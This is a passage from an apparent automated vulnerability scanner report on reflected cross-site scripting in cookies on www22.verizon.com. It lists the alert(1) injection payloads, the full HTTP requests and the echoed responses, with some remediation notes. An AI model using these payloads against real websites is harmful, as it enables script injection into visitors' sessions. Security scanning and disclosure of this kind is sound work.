Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX429f7'><script>alert(1)</script>ffc246269ca; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX429f7'><script>alert(1)</script>ffc246269ca; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX429F7'><SCRIPT>ALERT(1)</SCRIPT>FFC246269CA ' />
...[SNIP]...

3.271. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8315"-alert(1)-"72b07553601 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=a8315"-alert(1)-"72b07553601; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125645
Expires: Sat, 20 Nov 2010 02:57:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "a8315"-alert(1)-"72b07553601"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.272. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload ee9d4<script>alert(1)</script>d473025d44e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXee9d4<script>alert(1)</script>d473025d44e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150432
Expires: Sat, 20 Nov 2010 03:00:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:56 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEE9D4<SCRIPT>ALERT(1)</SCRIPT>D473025D44E </DIV>
...[SNIP]...

3.273. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c19d5'><script>alert(1)</script>36277642c37 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc19d5'><script>alert(1)</script>36277642c37; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150436
Expires: Sat, 20 Nov 2010 03:00:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:51 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC19D5'><SCRIPT>ALERT(1)</SCRIPT>36277642C37 ' />
...[SNIP]...

3.274. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ff7"-alert(1)-"213bd3ed367 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=29ff7"-alert(1)-"213bd3ed367; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; 